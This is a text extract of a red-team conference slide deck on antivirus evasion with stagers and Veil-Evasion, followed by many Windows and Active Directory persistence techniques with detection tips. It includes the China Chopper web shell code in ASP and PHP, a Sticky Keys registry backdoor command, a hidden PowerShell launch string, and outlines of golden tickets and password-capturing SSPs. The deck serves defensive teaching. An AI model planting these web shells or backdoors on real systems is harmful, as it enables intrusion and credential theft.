This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
2. Christopher Truncer
Previous Systems Administrator turned Red Teamer
Red Team Lead at Mandiant
Florida State Seminole
Open Source Developer
@ChrisTruncer
3. What’s this talk about?
◉ How Stagers Work
◉ Case Study: Bypassing a Signature
◉ The Right Way to do Detection
◉ Persistence - lots of it! :)
◉ Old School and New School Techniques
◉ Persistence Detection
◉ Questions
5. Antivirus Evasion
◉ Whites hats and attackers need to evade
antivirus
◉ Evading to establish immediate C&C of
compromised system
◉ Also used to maintain access on a system/in a
network
6. Antivirus Evasion
◉ If required to use an executable, we’ll use a
stager
◉ Stager - Veil-Evasion or MSFVenom output
◉ Inject shellcode into memory
◉ Shellcode will download and inject a reflective dll
◉ A “loader” for your real malware
7. Stagers
◉ Stagers can be developed in any language that
can interact with the Windows functions
◉ It’s not hard to write a stager
○ Just four function calls
8. Stagers
◉ Allocate memory to store shellcode, and set the
proper memory permissions
◉ Copy shellcode into the allocated memory
◉ Create a thread to execute the shellcode
◉ Have code wait until thread is done executing
14. Approaches to Bypassing AV
◉ Ghost code / net no-operation code
◉ Encrypted binaries
○ Hyperion
◉ Custom Code
15. Veil’s Approach
◉ Fight on-disk detection through different
techniques
○ Obfuscated code
○ Encrypted code
○ Non-standard languages for Windows binaries
■ Python, Ruby, Perl, etc.
○ Shellcode-less binaries
17. Veil’s Approach
◉ Using a language that’s not C or C# made a large
difference
○ AV programs didn’t know or couldn’t properly inspect
non-standard languages
◉ Example:
○ C vs. Python
23. Veil Module
◉ Add a little complexity, so it isn’t just easily
obvious what is happening
◉ What about encrypting the code?
◉ What about making the tool brute-force its own
key?
24. Stallion
◉ Generate a random encryption key, that is
artificially constrained
○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567
◉ Test for a known string with decryption key
○ If it doesn’t match, it’s the wrong key
○ If it matches, decrypt the shellcode and inject it into memory
29. Signature Bypass
◉ I was excited to see if someone finally figured
Veil-Evasion out
○ It is open source…
◉ Previous attempts have turned out fairly
humorous
40. Persistence Purposes
◉ Persistence is commonly used to for one of two
purposes:
○ Persisting on a host
○ Persisting a network
◉ A lot of the techniques I will cover can facilitate
access for both purposes
41. Persisting Hosts
◉ When persisting a host, an attacker is looking for
ad-hoc, or programmatically defined access, to a
system
○ Attacker want this as close to on-demand as possible
◉ The efforts undertaken by an attacker are
directed to maintaining access to a specific host
42. Persisting Hosts
◉ What’s needed for persisting hosts?
○ Survive Reboots
■ Probably the most important concept
○ Have administrative rights on the system
○ Compliment network based persistence
43. Persisting Networks
◉ Network based persistence in two contexts
○ Used to maintain access into a network
■ Similar to host-based persistence, but its purpose isn’t
for access to host, but the network
○ Used to maintain access into different networks
■ Don’t want to be VLANed off in in a VOIP network
44. Persisting Networks (continued)
◉ What’s other network based persistence options?
○ Attackers can use persistence not only to maintain access to
a network, but also obtaining their required domain
permissions on-demand
○ Access likely facilitated through a host-based persistence
technique
46. Web Shells
◉ Funny, this seems trivial and too easy that no one
would ever use this…
◉ ...that’s not the case
○ China Chopper - APT17, APT19, APT22
○ ITSecShell, reDuh, ASPShell
○ Even commodity code
47. China Chopper
◉ Very tiny webshell, about 4kb stored server side
◉ Developed in a variety of languages
○ CFM
○ ASP
○ PHP
○ Etc.
◉ A client application is used to interact with the
webshell
48. China Chopper Server Code
◉ ASP
○ <%@ Page
Language="Jscript"%><%eval(Request.Item["password"],"unsa
fe");%>
◉ PHP
○ <?php @eval($_POST['password']);?>
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
49.
50. China Chopper
◉ Really useful features in China Chopper
○ File Explorer
○ Upload/Download files
○ Mod file timestamp attributes
○ Database client - MSSQL, MySQL
○ Command shell
51. Web Shell Prevention & Detection
◉ Hunt/Sweep for known bad files
○ Hashes, or other file based indicators
◉ Blacklist all filetypes except expected files for
upload functionality
◉ Don’t allow your web server to execute files
uploaded from untrusted sources
52. Magic Packet
◉ Or “how to access port 12345 with a packet to
port 443”
◉ The attacker’s problem:
○ Compromised a web server (port 80 and 443 are in use)
○ Firewall(s) prevent connection to any other port
○ Wants a TCP backdoor to be remotely accessible
■ Can’t be bothered to write a webshell
53. Magic Packet
◉ Run backdoor listening on port 12345
◉ Run malware “low” in the network stack
○ Check incoming TCP SYN packets
○ When a SYN packet is received with a specific signature,
change destination port from 443 to 12345
○ Windows network stack then delivers the pack to port 12345
○ Malware alters the port in all subsequent packets for the
stream
55. Magic Packet - Defenses
◉ This malware was installed via a custom
compiled executable
○ Application Whitelisting
○ Device Guard
56. Outlook
◉ Outlook rules can help provide a very unique
on-demand foothold onto a host
◉ Silent Break wrote a post on leveraging Outlook
rules to gain access to a user’s system
◉ Provides access immediately when Outlook
triggers the rule
57. Outlook
◉ Attacker creates an Outlook rule to execute a
binary when the “trigger” subject is received
◉ Attacker will sync the rule against the target
user’s account
◉ Send an e-mail with the trigger in the subject
◉ Get shell :)
58.
59.
60. Outlook - Additional Tweaks
◉ Have another rule auto-delete the incoming
e-mail to prevent user detection of the trigger
○ https://silentbreaksecurity.com/malicious-outlook-rules/
61. Outlook - Detection
◉ Honestly, not certain on the best means to detect
this at scale
◉ Primary IOC is to execute a program when
receiving an e-mail
○ I don’t know if any legit use cases for this
63. Registry Hacks
◉ This is the 101 method for persistence that almost
everyone learns
◉ Extremely easy to set up, and can be installed
with a range of permissions
64. Registry Hacks
◉ These can be configured to run when the system
starts, or a user logs into the system
○ HKLMSOFTWAREMicrosoftWindowsCurrentVersionR
un
○ HKCUSOFTWAREMicrosoftWindowsCurrentVersionR
un
◉ These methods are highly publicized and well
known.
◉ Defensive tools look for these
65. Registry Hacks - Takeaway
◉ These can be good for maintaining initial access,
but not for long term use
◉ SOCs - you want to have the ability to detect
these
66. Startup Folder
◉ Your system will execute files in the startup
folder
○ C:ProgramDataMicrosoftWindowsStart
MenuProgramsStartup
67. Scheduled Tasks
◉ Scheduled tasks are an easy way for a user of
any level to persist on a system
◉ With the proper permissions, you can schedule a
task up to the SYSTEM level
◉ This is Microsoft’s recommendation/alternative
to using “at” jobs
68. Scheduled Tasks
◉ Scheduled tasks can be created from the
command line with schtasks.exe or the GUI
◉ Tasks can run at startup, when a user logs into
the system, after the system has been idle, etc.
◉ Tasks can run binaries, PowerShell one-liners,
and more
71. Scheduled Tasks - Detection
◉ Obtain a baseline of the scheduled tasks set to
run on your systems
○ Schtasks /query
○ Task scheduler
○ Etc.
◉ Audit systems and identify deviations from your
baseline
72. Service Manipulation
◉ Services usually run with SYSTEM level
permissions, so can be juicy targets for attackers
◉ Easy way to install service based persistence?
Check service binary write permissions!
73.
74. Service Manipulation
◉ Now that you found services that can be
modified, you just need a service binary.
○ Veil-Evasion, PowerUp, custom code
◉ Save the original service binary
◉ Bounce the box (or service) if required
75. Sticky Keys
◉ With administrative access to a machine, you can
easily setup sticky keys
○ Copy sethc.exe
○ Copy cmd.exe to C:WindowsSystem32sethc.exe
○ Reboot, and hit shift five times
76.
77. Sticky Keys - Another Method
◉ Set cmd.exe as the debugger for sethc.exe
◉ REG ADD
"HKLMSOFTWAREMicrosoftWindows
NTCurrentVersionImage File Execution
Optionssethc.exe" /v Debugger /t REG_SZ /d
"C:windowssystem32cmd.exe"
78. Sticky Keys - Another Method
◉ Main problem - doesn’t require authentication
◉ If using Sticky Keys, ensure it’s calling back to a
location you control, vs. opening up the system
for everyone
79. Sticky Keys - Detection
◉ Compare known good sethc.exe binary hash with
systems’ current sethc.exe binary
◉ Ensure no registry key is added defining a
debugger for sethc.exe
81. DLL Search Order Hijack
◉ DLL search order hijacking exploits how windows
searches for DLLs when loading an executable
◉ Specifically, it exploits the fact that Windows will
always search the currently folder of the
executable for a dll
82. DLL Search Order Hijack
◉ Sample in CAPEC
○ If you drop ntshrui.dll within C:Windows and run
explorer.exe, you can get the dll within C:Windows to be
executed
◉ This exploits the order in which the dll is
searched for on a Windows system
83. DLL Search Order Hijack
◉ Attackers create malicious DLLs that exploit this
search order to get their DLL to run on a system
◉ Since it’s every time the application runs, it can be
used as a persistence technique
◉ PowerUp can be used to find these opportunities
84. DLL Search Order Hijack
◉ Used by the following actors:
○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26
◉ Used by the following malware:
○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
85. Legitimate Scheduled Tasks
◉ Easy to identify
scheduled tasks
named “Evil task”
◉ First we must look at
how investigators
detect malicious
scheduled tasks
86. Legitimate Scheduled Tasks
◉ Stacking tasks across
multiple systems to
determine anomalous
tasks
◉ Parse task scheduler
log (schedLgu.txt)
87. Legitimate Scheduled Tasks
◉ What if we modify
existing legit
scheduled tasks?
○ Specifically tasks that are
not required for Windows
functionality
88. Unquoted Service Paths
◉ Unquoted service paths exploit a vulnerability in
the order that Windows searches for a binary
when a space is in an unquoted path
○ C:Program Files(x86)SteamSteam Gamingsteam.exe
89. Unquoted Service Paths
◉ C:Program Files(x86)SteamSteam
Gamingsteam.exe
○ C:Program.exe
○ C:Program Files(x86)SteamSteam.exe
○ C:Program Files(x86)SteamSteam Gamingsteam.exe
◉ Three opportunities
90. Unquoted Service Paths
◉ If we have write access to any of the paths that
Windows looks for, we can hijack the service
○ Just need a service binary
◉ Drop it into any of the paths on the previous slide,
and restart the service
○ Might need to wait for a reboot
91. Unquoted Service Paths - Prevention
◉ Check service binaries on your images and
determine if any are using unquoted service
paths.
◉ Make sure the paths aren’t writable to
non-admins.
◉ PowerUp can find these as well
93. WMI Requirements - Event Filter
◉ The WMI query that fires upon an event occurring
○ Usually, an event class derived from
__InstanceModificationEvent, __InstanceCreationEvent, or
__InstanceDeletionEvent
94. WMI Requirements - Event Consumer
◉ There are five different event consumers
○ The most interesting one is “CommandLineEventConsumer”
◉ These “consume” or act on events that occur
95. WMI Requirements - Filter/Consumer Binding
◉ This associates a WMI Event Filter with the Event
Consumer
96. WMI - Persistence
◉ PowerSploit’s persistence module for WMI
○ Automates the creation process
○ Will create a permanent WMI event subscription
97. PowerShell Profiles
◉ Anytime PowerShell runs, it will execute code in
the default profile
◉ Create profile code here:
○ C:WindowsSystem32WindowsPowerShellv1.0profile.p
s1
98. PowerShell Profiles
◉ Use standard persistence mechanism to execute
PowerShell silently
○ "C:WindowsSystem32WindowsPowerShellv1.0powers
hell.exe" -NonInteractive -WindowStyle Hidden
○ It’s a legit exe!
100. Security Support Provider
◉ A Security Support Provider (SSP) - a security
package
○ An extension used to perform authentication during
client/server exchange
◉ An Authentication Package (AP)
○ Extends interactive login authentication
○ Example: RSA tokens
101. Security Support Provider
◉ SSP/AP
○ Can serve tasks of SSPs and APs - loaded into lsass at boot
○ Example: Kerberos and msv1_0 (NTLM)
102. Security Support Provider
◉ Install your own SSP that is loaded into lsass.exe
◉ Can develop your own SSP DLL
◉ Use Persistence module in PowerSploit to install
your malicious SSP
103. Security Support Provider
◉ Ben Delpy (@gentilkiwi) added SSP functionality
into mimilib.dll
○ Once installed and loaded into lsass.exe, it captures
plaintext passwords
104.
105.
106. Excel Magic
◉ Malicious macro executes backdoor
◉ How can you ensure persistence?
○ Most users will run Excel once a day
○ You can use any “old school” techniques to spawn Excel
○ Disable macro settings to run macro without user prompt
107. Excel Magic
◉ Registry modification that opens specific
Workbook upon starting Excel
○ HKEY_CURRENT_USERSoftwareMicrosoftOffice12.0Ex
celSecurityTrusted Locations
○ Just add the location
112. Golden Tickets
◉ Method was developed with Ben Delpy and Sean
Metcalf
◉ Forges a “golden” kerberos ticket which can be
good for 10 years!
◉ Golden tickets provide on-demand domain
privilege “upgrades” for any group within the
domain
113. Golden Tickets
◉ Only need four pieces of information
○ Domain SID
○ Name of the domain
○ User you want to create a ticket for
○ Krbtgt account hash
◉ You can build your ticket at home, offline
114.
115.
116.
117. Golden Ticket Takeaways
◉ If impersonating an account, tickets are still valid
even if password changes
◉ Valid for as long as you specify (10 year default)
◉ Domain trusts
○ Child domains can compromise the parent
◉ Only way to stop is change krbtgt hash… twice…
◉ Or rebuild from bare metal
118. Account Checkout - Case Study
◉ Client had account checkout system for domain
administrator accounts
◉ Only two users with access to checkout system
◉ System requires 2FA
◉ DA access is lost if user changes their
password/pin/token
◉ Users can see checked out accounts
119.
120. Account Checkout - Case Study
◉ Persist domain administrator without getting
caught
○ Can’t continuously check out accounts
◉ Password vault permissions were managed
through Active Directory groups
○ Tons of them
121. Account Checkout - Case Study
◉ Copy group memberships to a compromised
user account
○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed
without needing access to their Password Vault
122. Account Checkout - Case Study
◉ Copy group memberships to a compromised
user account
○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed
without needing access to their Password Vault
124. Conclusions
◉ Persistence will remain rampant
◉ Always new and creative ways to maintain
persistence
◉ Understanding persistence techniques is critical
to detecting attacker access